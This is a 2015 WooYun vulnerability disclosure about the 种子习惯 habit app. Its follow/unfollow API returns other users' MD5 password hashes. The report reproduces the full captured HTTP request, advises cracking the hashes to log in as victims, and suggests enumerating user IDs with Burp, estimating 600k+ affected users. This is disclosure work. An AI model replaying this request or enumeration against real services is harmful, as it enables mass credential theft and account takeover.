当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
种子习惯app某漏洞导致用户密码泄露(目测50w+用户)
相关厂商:
漏洞作者:
提交时间:
2015-03-24 12:44
修复时间:
2015-05-08 12:46
公开时间:
2015-05-08 12:46
漏洞类型:
敏感信息泄露
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2015-03-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

正常的app功能却返回了不应该返回的信息

详细说明:

问题出在app的关注用户功能上

Screenshot_2015-03-20-21-00-04.png


抓包(只能关注一次即第一次发包,发包一次才会返回信息)

POST /zhongzi/v2.php/User/cancelFollow HTTP/1.1
Cookie: PHPSESSID=a7loj0cjqe4emeu2hjn567i0i6; path=/
Content-Length: 558
Content-Type: multipart/form-data; boundary=Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Host: api.idothing.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Content-Disposition: form-data; name="user_id"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
667521
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Content-Disposition: form-data; name="followed_user_id"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
246
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO
Content-Disposition: form-data; name="appid"
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 8bit
100
--Ax9mJe9mOtt1jMlN1RKpt25FUELXUl1gtFO--


1.png


2.png


返回的md5加密的密码解一下 然后登入

Screenshot_2015-03-20-21-00-04.png


漏洞证明:

用burp跑一下试试

搜狗截图20150320213509.png


user_id到60多w了 所以涉及用户不少

修复方案:

各种过滤

版权声明:转载请注明来源 Vern@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)